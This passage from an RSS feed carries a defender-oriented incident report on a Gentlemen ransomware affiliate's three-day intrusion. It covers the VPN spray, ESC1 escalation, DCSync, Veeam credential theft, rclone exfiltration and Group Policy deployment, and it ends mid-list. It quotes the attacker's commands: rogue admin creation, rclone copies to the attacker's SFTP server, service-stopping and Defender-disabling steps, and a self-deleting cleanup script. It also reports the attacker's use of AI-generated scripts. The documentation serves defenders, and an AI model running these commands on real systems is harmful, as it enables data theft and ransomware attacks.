<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>breachcache</title><description>Cybercrime operations, documented for defenders.</description><link>https://breachcache.com/</link><language>en-us</language><item><title>The Gentlemen: A New Affiliate&apos;s Playbook</title><link>https://breachcache.com/cases/the-gentlemen-ransomware/</link><guid isPermaLink="true">https://breachcache.com/cases/the-gentlemen-ransomware/</guid><description>Three day intrusion: SSL VPN credential spray, AD CS ESC1 to Domain Admin, Veeam credential theft, rclone exfiltration over SFTP, and The Gentlemen ransomware pushed through Group Policy. Tamper Protection blocked the encryptor on every host that still had it enabled, so only the unprotected hosts were encrypted.</description><pubDate>Mon, 22 Jun 2026 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;At a Glance&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Dwell time: 3 days&lt;/li&gt;
&lt;li&gt;Initial access: SSL VPN credential spraying, a single password against a username pool of more than 115,000 generated names, one account matched&lt;/li&gt;
&lt;li&gt;Privilege escalation: AD CS ESC1 then UnPAC the hash to recover the Administrator NT hash&lt;/li&gt;
&lt;li&gt;Credential access: DCSync and Veeam configuration database decryption&lt;/li&gt;
&lt;li&gt;Persistence: a Domain Admin account disguised as a backup service account&lt;/li&gt;
&lt;li&gt;Lateral movement: RDP, Impacket wmiexec, and NetExec across every reachable host&lt;/li&gt;
&lt;li&gt;Defense evasion: Microsoft Defender disabled, exclusions added, Security event log cleared&lt;/li&gt;
&lt;li&gt;Exfiltration: rclone over SFTP to the threat actor VPS, a second cloud attempt over pixeldrain&lt;/li&gt;
&lt;li&gt;Impact: The Gentlemen ransomware staged through Group Policy&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Attack Flow&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/the-gentlemen-ransomware/attack-flow.png?v=5&quot; alt=&quot;Attack Flow&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Executive Summary&lt;/h2&gt;
&lt;p&gt;This intrusion was run by a new affiliate to The Gentlemen who is assessed to have just left the DragonForce group. The affiliate is one of a number of experienced affiliates moving to The Gentlemen from older ransomware operations like DragonForce and LockBit. The steady arrival of skilled affiliates from these operations has driven much of the group&apos;s growth over the past year. This blog follows that affiliate across the full intrusion.&lt;/p&gt;
&lt;p&gt;Over this three day intrusion a Gentlemen ransomware affiliate gained initial access to the network through the SonicWall SSL VPN. The threat actor obtained the credential by spraying the password &lt;strong&gt;Spring2026&lt;/strong&gt; from 45.74.59[.]0/24 against a generated username list across more than 150,000 attempts. They validated the working credential and returned through a set of VPS addresses using SonicWall NetExtender.&lt;/p&gt;
&lt;p&gt;The threat actor escalated to Domain Admin through an &lt;code&gt;ESC1&lt;/code&gt; attack on Active Directory Certificate Services. They requested a certificate from a template that permitted a user with no administrative rights to specify the subject, set the subject alternative name to a Domain Admin account. The threat actor used that certificate to authenticate as Administrator and recover the Administrator NT hash directly from the resulting ticket. With the hash they ran DCSync against the domain controller and dumped all of the password hashes in the entire domain.&lt;/p&gt;
&lt;p&gt;They created a Domain Admin account disguised as a backup service account which was used for the rest of the intrusion. From there they moved to the backup server, disabled Microsoft Defender, and ran a credential decryptor against the Veeam configuration database to recover the stored backup credentials. On the second day they tested read and write access to every host in the domain with NetExec and exfiltrated the file shares with rclone over SFTP to their own VPS. On the third day they deployed The Gentlemen ransomware across the domain through its built in Group Policy deployment module. The payload was delivered to every host in the domain but only encrypted the ones that did not have &lt;strong&gt;Microsoft Defender Tamper Protection&lt;/strong&gt; enabled. On every workstation that kept Tamper Protection enabled Microsoft Defender blocked the payload and quarantined it.&lt;/p&gt;
&lt;h2&gt;The Gentlemen&lt;/h2&gt;
&lt;p&gt;The Gentlemen is a ransomware as a service operation that emerged in mid 2025. The first encryptor sample was uploaded to VirusTotal on July 17 2025 and already contained the leak site address. The group began posting victims to its leak site in September 2025. &lt;a href=&quot;https://www.group-ib.com/blog/hastalamuerte-gentlemen-raas-ttps/&quot;&gt;Group-IB&lt;/a&gt; assessed The Gentlemen to be a splinter of the Qilin ransomware operation. The administrator who runs The Gentlemen previously ran a Qilin affiliate crew known as ArmCorp and left Qilin after a payment dispute in July 2025 over an unpaid commission. The group advertises across multiple underground forums and recruits &quot;penetration testers&quot; and other skilled actors as affiliates and offers them 90 percent of each ransom payment.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/the-gentlemen-ransomware/gentlemen-forum-recruitment.png&quot; alt=&quot;The Gentlemen administrator Zeta88 advertising the ransomware as a service program on an underground forum and inviting pentesters to collaborate. Source: Check Point Research&quot; /&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;The Gentlemen administrator Zeta88 advertising the RaaS on an underground forum on September 12 2025, inviting pentesters to collaborate and offering affiliates 90 percent of each ransom. Source: &lt;a href=&quot;https://research.checkpoint.com/2026/thus-spoke-the-gentlemen/&quot;&gt;Check Point Research&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The group provides its affiliates ransomware builds written in Go for Windows, Linux, NAS and BSD and a separate build written in C for ESXi. &lt;a href=&quot;https://research.checkpoint.com/2026/dfir-report-the-gentlemen/&quot;&gt;Check Point Research&lt;/a&gt; and &lt;a href=&quot;https://www.halcyon.ai/ransomware-research-reports/threat-assessment-the-gentlemen-ransomware-group&quot;&gt;Halcyon&lt;/a&gt; documented the encryptor deriving a key with X25519 and encrypting file contents with the XChaCha20 cipher. It appends a random 6 character extension to each file it encrypts and drops a ransom note named README-GENTLEMEN.txt. Verified affiliates also receive tooling to disable endpoint protection and pivot infrastructure for moving through segmented networks.&lt;/p&gt;
&lt;p&gt;The Gentlemen runs a double extortion model. The group exfiltrates victim data before encryption and threatens to publish it on a Tor leak site and runs an X account that names victims to pressure them into paying. Negotiations run through the individual affiliate&apos;s Tox ID rather than the leak site. &lt;a href=&quot;https://blog.checkpoint.com/research/the-gentlemen-a-new-ransomware-threat-climbing-the-charts-fast/&quot;&gt;Check Point Research&lt;/a&gt; recorded over 320 victims on the leak site in April 2026. By mid 2026 the group ranked as the second most active ransomware group behind Qilin. As of June 2026 &lt;a href=&quot;https://www.ransomware.live/group/thegentlemen&quot;&gt;Ransomware.live&lt;/a&gt; tracks 504 victims on the leak site.&lt;/p&gt;
&lt;h2&gt;Attribution&lt;/h2&gt;
&lt;p&gt;This intrusion deployed The Gentlemen ransomware. The payload dropped on the encrypted hosts was written in Go and matched The Gentlemen ransomware which Microsoft Defender flagged as &lt;code&gt;Ransom:Win64/Gentlemen.SH!MTB&lt;/code&gt;. The ransom note it dropped, README-GENTLEMEN.txt, was The Gentlemen note. The operator who ran this intrusion uses the alias AlexSupp and is assessed to be an ex DragonForce and LockBit affiliate based on data BreachCache collected. How the DragonForce attribution was determined will not be disclosed but it was made with very high confidence.&lt;/p&gt;
&lt;p&gt;The operator most likely is Russian speaking. During the operation the operator pasted Russian language comments into their own commands and pasted Russian language AI assistant output into the console. The language points to an operator in a Russian speaking region. The operator also created a persistence account with the password L0ckb1t38217, LockBit in leetspeak. The Supp in the AlexSupp alias follows the same LockBit naming convention seen in LockBitSupp, the alias of the LockBit leader.&lt;/p&gt;
&lt;h2&gt;Initial Access - Day 1&lt;/h2&gt;
&lt;p&gt;The threat actor gained SSL VPN access through credential spraying. The spray came from the network range 45.74.59[.]0/24 and ran against the SSL VPN portal over 4433. Every attempt used the password &lt;strong&gt;Spring2026&lt;/strong&gt; against a different username. The usernames attempted were from a list of common surnames prefixed with a first initial and a first name dot surname which matched the corporate account convention such as the following examples that were collected jhoffmann, b.urban, r.webber, and mshifflett. On the first day of the intrusion there were a recorded &lt;strong&gt;153,455&lt;/strong&gt; SSL VPN authentication failures across &lt;strong&gt;115,535&lt;/strong&gt; different usernames and the spray kept going at that volume across all three days.&lt;/p&gt;
&lt;p&gt;The first use of the valid credential was a validation at the SSL VPN portal at 18:48 UTC from 45.74.59[.]54 which matched a correct user and password combination. The IP authenticated and disconnected 17 seconds later without opening an SSL VPN session. The threat actor returned at 18:53 UTC from 158.94.211[.]14, opened a VPN session into the network, and was assigned an internal address on the user VPN pool. The threat actor used 91.92.242[.]32 and 91.92.243[.]17 across all three days and connected from 91.92.243[.]151 with the hostname WIN-8H6JMQBVGP2 only on day 1.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;time=&quot;2026-05-29 18:48:11 UTC&quot; m=745 msg=&quot;User login denied - LDAP authentication failure&quot; sess=&quot;Portal&quot; usr=&quot;rcadena@domain.local&quot; src=45.74.59[.]21 dst=4433 proto=tcp/4433

time=&quot;2026-05-29 18:48:11 UTC&quot; m=745 msg=&quot;User login denied - LDAP authentication failure&quot; sess=&quot;Portal&quot; usr=&quot;i.aleman@domain.local&quot; src=45.74.59[.]203 dst=4433 proto=tcp/4433

time=&quot;2026-05-29 18:48:19 UTC&quot; m=238 msg=&quot;WAN zone remote user login allowed&quot; sess=&quot;Portal&quot; usr=&quot;[redacted]&quot; src=45.74.59[.]54 dst=4433 proto=tcp/4433
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Reconnaissance - Day 1&lt;/h2&gt;
&lt;p&gt;Seconds after the first SSL VPN session opened at 18:53 UTC the threat actor began mapping the network. They ran a TCP SYN scan across the subnet over 445, 88, 389, 636, 135, 53, and 9401 which mapped the live hosts and surfaced the Veeam backup service. Port 9401 is the Veeam Backup Service secure connection port and is commonly seen being scanned during the initial access phase.&lt;/p&gt;
&lt;p&gt;In the same session the threat actor enumerated the domain over LDAP against the domain controller and queried the privileged groups and account information. They then tested access by attempting to authenticate to every host in the domain.&lt;/p&gt;
&lt;p&gt;The session opened at 18:53:38 UTC and the first scan started under a second later. Due to the speed the full session was likely automated, a first pass that confirms the credential is a valid domain user and measures its level of access to decide whether the target is worth following up on.&lt;/p&gt;
&lt;p&gt;The queries mapped the privileged groups in the domain and located the domain controller, and they checked whether the compromised account held membership in any of those groups.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LDAP filter, enumerate the privileged groups
( |
  (objectSid=S-1-5-21-&amp;lt;domain&amp;gt;-512)    Domain Admins
  (objectSid=S-1-5-21-&amp;lt;domain&amp;gt;-519)    Enterprise Admins
  (objectSid=S-1-5-21-&amp;lt;domain&amp;gt;-544)    Administrators
  (objectSid=S-1-5-32-549)             Server Operators
  (objectSid=S-1-5-32-551)             Backup Operators
)

LDAP filter, locate the domain controller
(userAccountControl&amp;amp;8192)
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Privilege Escalation - Day 1&lt;/h2&gt;
&lt;p&gt;At 20:33 UTC the threat actor returned on a second SSL VPN session and ran LDAP enumeration against Active Directory Certificate Services. The queries read the enrollment service object and every certificate template with its enrollment flags and security descriptor which is the enumeration the &lt;code&gt;certipy find&lt;/code&gt; command performs. One template was misconfigured for ESC1 and allowed the enrollee to supply the subject of the certificate.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;LDAP filter, enrollment service
( objectClass=pKIEnrollmentService )

LDAP filter, certificate templates
( objectClass=pKICertificateTemplate )
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Two minutes later at 20:37 UTC the threat actor requested a certificate from that template and set the subject alternative name to &lt;code&gt;upn=administrator@domain.local&lt;/code&gt; and the enterprise CA issued it. The certificate authenticated as a Domain Admin account.&lt;/p&gt;
&lt;p&gt;At 20:39 UTC the threat actor used the certificate to obtain a Kerberos ticket granting ticket as Administrator through PKINIT (Event 4768, PreAuthType 16, certificate issuer the enterprise CA). Right after they requested a service ticket for the Administrator account to itself with enc-tkt-in-skey set (Event 4769, TicketOptions 0x40810018). The enc-tkt-in-skey flag makes this a user to user request which returns the ticket encrypted with the threat actor&apos;s session key and exposes the Administrator NT hash inside it through the UnPAC the hash technique. The discovery, the certificate request, and the authentication map to the &lt;code&gt;certipy find&lt;/code&gt;, &lt;code&gt;req&lt;/code&gt;, and &lt;code&gt;auth&lt;/code&gt; commands.&lt;/p&gt;
&lt;h2&gt;Credential Theft and Persistence - Day 1&lt;/h2&gt;
&lt;p&gt;As Administrator the threat actor ran DCSync against the domain controller at 20:40 UTC and replicated the directory secrets (Event 4662) which dumped every password hash in the domain including krbtgt. The escalation from the first certificate request to the full credential dump took under 4 minutes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Event 4662: Directory Service Access
Account: Administrator
Object: domainDNS (domain root)
Access: 0x100 Control Access
Properties:
  DS-Replication-Get-Changes {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}
  DS-Replication-Get-Changes-All {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At 20:45 UTC the threat actor connected to the domain controller over WinRM as Administrator using the recovered hash. The logon spawned wsmprovhost.exe on the domain controller and the threat actor ran the following net commands over that WinRM session to create veeam-backup at 20:46 UTC (Event 4720) and add it to Domain Admins (Event 4728). The name was chosen to look like a legitimate Veeam service account and the threat actor used veeam-backup for the rest of the intrusion.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;net user veeam-backup P@ssw0rd /add /domain
net group &quot;domain admins&quot; veeam-backup /add /domain
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Veeam Credential Theft - Day 1&lt;/h2&gt;
&lt;p&gt;At 20:48 UTC the threat actor logged into the domain controller over RDP as veeam-backup and from the domain controller used mstsc.exe to RDP into the Veeam backup server at 20:49 UTC. On the backup server they disabled Microsoft Defender real time protection at 20:51 UTC and began pulling the credentials Veeam stores in its configuration database. The first attempts to dump the credentials with psql did not work and the threat actor spent the next half hour working at it.&lt;/p&gt;
&lt;p&gt;The threat actor attempted to recover the credentials with DecryptVeeamEncryptedPasswords, a PowerShell decryptor they copied from their operating host into the veeam-backup Downloads folder and ran first through powershell and then through pwsh against the configuration database. The script is AI generated and its output uses an emoji status marker on every line and color coded Write-Host messages which are markers of LLM produced PowerShell. The script parsed but failed to connect to the PostgreSQL configuration database.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/the-gentlemen-ransomware/veeam-script-ai.png&quot; alt=&quot;DecryptVeeamEncryptedPasswords-V2.ps1, the AI generated Veeam decryptor recovered from the backup server&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;The Veeam Console - Day 1&lt;/h2&gt;
&lt;p&gt;The threat actor created a second local account named Admin2 on the backup server with the password L0ckb1t38217 and added it to the local Administrators group. The password spells out LockBit in leetspeak and points to the operator following a LockBit playbook.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;net user Admin2 L0ckb1t38217 /add
net localgroup Administrators Admin2 /add
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;From the threat actor&apos;s host WIN-8H6JMQBVGP2 they opened a new RDP session into the backup server as Admin2 and launched the Veeam Backup and Replication console. The Veeam services were not running, likely because the script they ran earlier had stopped the Veeam service, so the threat actor started the backup service and the gateway service by hand and queried the service state until the console came up.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;net start VeeamBackupSvc
net start VeeamBackupGatewaySvc
sc query VeeamBackupSvc
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The threat actor did not recover the Veeam credentials on the first day and logged out of the last SSL VPN session of the day at 21:34 UTC. The full day ran from 18:53 to 21:34 UTC and added up to roughly 51 minutes of connected time.&lt;/p&gt;
&lt;h2&gt;Return - Day 2&lt;/h2&gt;
&lt;p&gt;At 08:57 UTC on the second day the threat actor returned and ran the Veeam decryptor on the backup server again through Impacket wmiexec as the built in domain Administrator account, not the veeam-backup Domain Admin they created. The base64 encoded command queried the VeeamBackup database and decrypted the stored passwords to recover svc.backup, the Veeam backup service account credential.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ParentImage:  C:\Windows\System32\wbem\WmiPrvSE.exe
CommandLine:  cmd.exe /Q /c powershell.exe -e JABQAG8AcwB0AGcAcgBlAFMAcQBsAEUAeABlAGMA... -OutputFormat Text 1&amp;gt; \Windows\Temp\LjHFmt 2&amp;gt;&amp;amp;1
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Write Access Test - Day 2&lt;/h2&gt;
&lt;p&gt;At 09:30 UTC the threat actor ran a write access test with NetExec against ADMIN$, C$, and IPC$ on every host in the domain. On each host the test wrote a file with a 10 character random name into the ADMIN$ share which confirmed the threat actor had read and write access to the network shares. The 10 character random file name is how NetExec and CrackMapExec check write access on a share. On every host the test opened the IPC$ share with a 0x3 read and write access mask and bound the srvsvc and svcctl named pipes, the RPC access NetExec and CrackMapExec use to enumerate shares and services. The same test authenticated to the hosts as veeam-backup and the recovered svc.backup and confirmed write access across the network.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/the-gentlemen-ransomware/netexec-writetest.png&quot; alt=&quot;Sysmon Event 11 file create from the NetExec write access test, a 10 character random file name written to ADMIN$ on the domain controller&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Exfiltration - Day 2&lt;/h2&gt;
&lt;p&gt;The threat actor staged the exfiltration tool by copying rclone.exe into the veeam-backup Downloads folder on the domain controller through the RDP session, then ran rclone config to set up the remotes. They mapped the file shares to network drives over net use at 12:24 UTC and pointed rclone at them.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;net use E: &quot;\\fileserver\Share 1&quot; /persistent:yes
net use F: &quot;\\fileserver\Share 2&quot; /persistent:yes
net use H: &quot;\\fileserver\Share 3&quot; /persistent:yes
net use M: &quot;\\fileserver\Share 4&quot; /persistent:yes
net use S: &quot;\\fileserver\Share 5&quot; /persistent:yes
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To stage the shares for exfiltration the threat actor pasted AI generated PowerShell commands that built a folder of symbolic links to each share under C:\AllBackups. Each link pointed at a network share so one rclone copy of C:\AllBackups would pull every share at once. The first version the threat actor pasted used invented share names which did not exist so the threat actor ran net view against the file server, copied the share names it returned into an AI assistant and pasted back the corrected version the assistant produced with those exact names. The corrected version includes the Russian comment (с правильными именами) which means with the correct names, the assistant flagging the share names it had guessed wrong in the first version.&lt;/p&gt;
&lt;div&gt;


&lt;div&gt;RussianEnglish&lt;/div&gt;
&lt;div&gt;# 1. Создаём корневую папку
New-Item -Path &quot;C:\AllBackups&quot; -ItemType Directory -Force
# 2. Создаём символические ссылки (с правильными именами)
New-Item -Path &quot;C:\AllBackups\Share1&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share1&quot;
New-Item -Path &quot;C:\AllBackups\Share2&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share2&quot;
New-Item -Path &quot;C:\AllBackups\Share3&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share3&quot;
New-Item -Path &quot;C:\AllBackups\Share4&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share4&quot;
New-Item -Path &quot;C:\AllBackups\Share5&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share5&quot;&lt;/div&gt;
&lt;div&gt;# 1. Create the root folder
New-Item -Path &quot;C:\AllBackups&quot; -ItemType Directory -Force
# 2. Create the symbolic links (with the correct names)
New-Item -Path &quot;C:\AllBackups\Share1&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share1&quot;
New-Item -Path &quot;C:\AllBackups\Share2&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share2&quot;
New-Item -Path &quot;C:\AllBackups\Share3&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share3&quot;
New-Item -Path &quot;C:\AllBackups\Share4&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share4&quot;
New-Item -Path &quot;C:\AllBackups\Share5&quot; -ItemType SymbolicLink -Value &quot;\\fileserver.domain.local\Share5&quot;&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;The first exfiltration attempt at 12:32 UTC used a remote named waso which resolved to the public cloud file host pixeldrain. The threat actor ran rclone copy against the mapped drives and it failed due to network controls.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rclone copy E:\ F:\ H:\ M:\ S:\ waso:[redacted] --transfers 32 --progress --fast-list
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The threat actor switched to a second remote named wabo which was SFTP to 91.92.242[.]32 over 22 which is the same VPS used for the SSL VPN sessions. They ran rclone copy against each mapped drive and the share data left over SFTP between 15:01 and 16:01 UTC to the threat actor&apos;s own infrastructure.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rclone copy H:\ wabo:[redacted] --transfers 32 --progress
rclone copy M:\ wabo:[redacted] --transfers 320 --progress
rclone copy S:\ wabo:[redacted] --transfers 320 --progress
rclone copy F:\ wabo:[redacted] --transfers 320 --progress
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At 16:06 UTC the threat actor ran Advanced IP Scanner and systeminfo on the domain controller before closing out the day. The threat actor did not deploy the ransomware on the second day. They had exfiltrated the data and mapped the network but had not run the payload. The second day ran from 08:57 to 16:43 UTC and totaled about 3 hours and 26 minutes of connected time.&lt;/p&gt;
&lt;h2&gt;Data Review - Day 3&lt;/h2&gt;
&lt;p&gt;The third day opened at 08:13 UTC with the threat actor reviewing the data from the file shares by hand. Over the existing RDP session into the domain controller they went into user profiles across the network over SMB and opened credential files and notes from user desktops, downloads, and documents in Notepad and the browser. They ran Advanced IP Scanner to scan the network again and ran systeminfo. The threat actor spent close to an hour reading the victim data before deploying the ransomware. Between 09:15 and 09:20 UTC they also tried to SSH into the mail server from the domain controller as root, using a few different credentials they obtained during the incident, all of which failed.&lt;/p&gt;
&lt;h2&gt;Ransomware Deployment - Day 3&lt;/h2&gt;
&lt;p&gt;At 09:21 UTC the threat actor opened the Group Policy Management console and staged the payload, a Go binary named G_9w5ey0_windows_amd64.exe, then ran it in Group Policy deployment mode with a password argument.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;G_9w5ey0_windows_amd64.exe --password [redacted] --gpo
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;--gpo&lt;/code&gt; mode abuses Windows Group Policy so that a single action on the domain controller would push the payload to every domain joined host. It copied the payload and a cleanup batch file into the NETLOGON share and created two Group Policy Objects linked at the domain root which every host reads at the next policy refresh. The payload then set up its own persistence on each host it executed on, ONSTART scheduled tasks named UpdateSystem and UpdateUser pointing back at the NETLOGON copy along with Run keys.&lt;/p&gt;
&lt;p&gt;The cleanup batch file staged alongside the payload paused for a moment, deleted the binary from the NETLOGON share, and then deleted itself, which removed the staged copy once the scheduled tasks had pulled it down to each host.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@echo off
ping 127.0.0.1 -n 3 &amp;gt; nul
del /f /q &quot;\\domain.local\NETLOGON\G_9w5ey0_windows_amd64.exe&quot; &amp;gt;nul 2&amp;gt;&amp;amp;1
del /f /q &quot;%~f0&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The threat actor then ran the payload directly from the domain controller in its share encryption mode against the network shares rather than the scheduled tasks, first with the &lt;code&gt;--shares&lt;/code&gt; flag and then again with &lt;code&gt;--no-admin&lt;/code&gt; added.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;G_9w5ey0_windows_amd64.exe --password [redacted] --shares
G_9w5ey0_windows_amd64.exe --password [redacted] --shares --no-admin
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Neither run encrypted the file shares. The file shares are on a Samba file server and veeam-backup was not granted write access to them, so the account could read the shares, which is what the exfiltration used on the second day, but could not write to them, and the &lt;code&gt;--shares&lt;/code&gt; mode was not able to encrypt anything on the Samba shares.&lt;/p&gt;
&lt;h2&gt;Encryption - Day 3&lt;/h2&gt;
&lt;p&gt;Every time the payload ran it stopped services, added Microsoft Defender process and path exclusions, deleted shadow copies with vssadmin and wmic, killed wbadmin to block recovery, cleared the Security event log, encrypted the host, and dropped a ransom note named README-GENTLEMEN.txt across the system and user profiles. On the domain controller the exclusions, the log clear, and the note all landed within twenty five seconds of the Group Policy push.&lt;/p&gt;
&lt;p&gt;The payload ran the service stops through net.exe spawned as a direct child of G_9w5ey0_windows_amd64.exe and stopped &lt;strong&gt;103 distinct services&lt;/strong&gt; in under one second. The sequence started at 09:25:49 UTC with 2 PowerShell commands that stopped every running virtual machine and the Hyper-V and VMware services. The backup software Veeam, BackupExec, CommVault, Acronis, Datto, and NetBackup went down along with the Windows shadow copy services vss, wbengine, SDRSVC, and swprv. The database services MSSQLSERVER, SQLSERVERAGENT, MSSQL$SQLEXPRESS, MySQL, MariaDB, PostgreSQL, and Oracle were taken down along with the security software Sophos, Symantec, and 360 Security.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;powershell -Command &quot;Get-VM | Stop-VM -Force -TurnOff&quot;
powershell -Command &quot;Get-VM | Where-Object State -eq &apos;Running&apos; | Stop-VM -Force -TurnOff&quot;
net stop vmms
net stop vmcompute
net stop veeam
net stop VeeamBackupSvc
net stop BackupExec*
net stop GxVss
net stop wbengine
net stop swprv
net stop MSSQLSERVER
net stop MSSQL*
net stop MySQL
net stop postgresql
net stop sophos
net stop Symantec*
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The payload did not get every host. Microsoft Defender detected and blocked the binary as &lt;code&gt;Ransom:Win64/Gentlemen.SH!MTB&lt;/code&gt; on every workstation that kept real time protection enabled, flagged the scheduled task, and quarantined the file from the NETLOGON share. Encryption stayed confined to the domain controller and the backup server, where the threat actor had turned Tamper Protection or Microsoft Defender off by hand during the intrusion, and the hosts that already had Tamper Protection off from before the intrusion started. Tamper Protection cannot be turned off through Group Policy or the registry, so the disable command the ransomware pushed was ignored on every host where Tamper Protection was still on, and the payload could only add its exclusions and encrypt where protection was already off.&lt;/p&gt;
&lt;p&gt;The ransom note dropped on every encrypted host had the file name README-GENTLEMEN.txt. Below is the note that was dropped.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/the-gentlemen-ransomware/ransom-note.png&quot; alt=&quot;README-GENTLEMEN.txt, the ransom note dropped on every encrypted host&quot; /&gt;&lt;/p&gt;
&lt;h2&gt;Negotiation&lt;/h2&gt;
&lt;p&gt;The ransom note published a single Tox ID for contact. That Tox ID belonged to the affiliate who carried out the attack. The affiliate provided the demand and a second Tox ID for the negotiation itself. The second Tox ID was A4DCA91E7CF7DBBF29250281BE720F0DE793540BFC93611C41797B6BA76E12678185602470FC.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/the-gentlemen-ransomware/negotiation-handoff.png&quot; alt=&quot;The affiliate handing over a second Tox ID for the negotiation&quot; /&gt;&lt;/p&gt;
&lt;p&gt;The second Tox ID belonged to a Tox account the group shared across its affiliates. The shared account used the username Gentle admin. The group claims to offer 24/7 support for its &quot;clients&quot; and does this by giving different affiliates access to the Gentle admin account to run the negotiations.&lt;/p&gt;
&lt;h2&gt;The Ransomware GPOs&lt;/h2&gt;
&lt;p&gt;The threat actor deployed the ransomware through two Group Policy objects, both created on the domain controller as veeam-backup and linked at the domain root ahead of the default policies. The directory service recorded both as objects of class groupPolicyContainer, windef at 09:22 UTC and WindowsG at 09:25 UTC (Event 5137), and the link added to the domain root and the Domain Controllers organizational unit (Event 5136, gPLink).&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://breachcache.com/cases/the-gentlemen-ransomware/gpo-audit.png?v=2&quot; alt=&quot;Active Directory audit, the two ransomware GPOs created and linked by veeam-backup&quot; /&gt;&lt;/p&gt;
&lt;p&gt;WindowsG was built by the ransomware&apos;s &lt;code&gt;--gpo&lt;/code&gt; deployment mode. &lt;a href=&quot;https://research.checkpoint.com/2026/dfir-report-the-gentlemen/&quot;&gt;Check Point Research&lt;/a&gt; documented this mode in April 2026 as a PowerShell routine run on the domain controller that copies the ransomware into the NETLOGON share, creates a Group Policy object with a Group Policy Preferences scheduled task that runs the payload as SYSTEM, and is built to force a Group Policy refresh across the domain so every computer applies it at once. The ransomware is under active development and the build in this intrusion is newer than the one Check Point Research documented. It runs the payload from a standing scheduled task instead of a task that runs once and removes itself. The &lt;code&gt;--gpo&lt;/code&gt; script forced the same domain wide refresh that Check Point documented, but the objects did not apply across the network at once, they applied as each host hit its own Group Policy refresh, the first within minutes of the link and the rest over the following hour and a half.&lt;/p&gt;
&lt;p&gt;WindowsG also included a Machine registry policy with eight values that turned off Microsoft Defender, &lt;code&gt;DisableAntiSpyware&lt;/code&gt;, &lt;code&gt;DisableRoutinelyTakingAction&lt;/code&gt;, &lt;code&gt;DisableRealtimeMonitoring&lt;/code&gt;, &lt;code&gt;DisableBehaviorMonitoring&lt;/code&gt;, &lt;code&gt;DisableOnAccessProtection&lt;/code&gt;, &lt;code&gt;DisableIOAVProtection&lt;/code&gt;, &lt;code&gt;SpynetReporting&lt;/code&gt;, and &lt;code&gt;SubmitSamplesConsent&lt;/code&gt;. The mode Check Point documented did not push a Defender policy through Group Policy, which is one of the differences in this later build.&lt;/p&gt;
&lt;p&gt;The scheduled task that delivers the payload also differs from the one Check Point documented. That version was a Group Policy Preferences immediate task, an &lt;code&gt;ImmediateTaskV2&lt;/code&gt; which runs once when the policy applies and then removes itself. The task in this intrusion is a &lt;code&gt;TaskV2&lt;/code&gt;, a standing scheduled task that stays on the host and fires the payload again on every one of its eleven triggers and on an hourly repeat. This build reruns the payload on a schedule instead of firing it a single time.&lt;/p&gt;
&lt;p&gt;The standing task changes the deployment in three ways.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The standing task runs the payload on hosts that were powered off or unreachable when the Group Policy applied, due to the boot and logon triggers firing the payload the next time the host starts or a user logs on rather than only during the forced refresh.&lt;/li&gt;
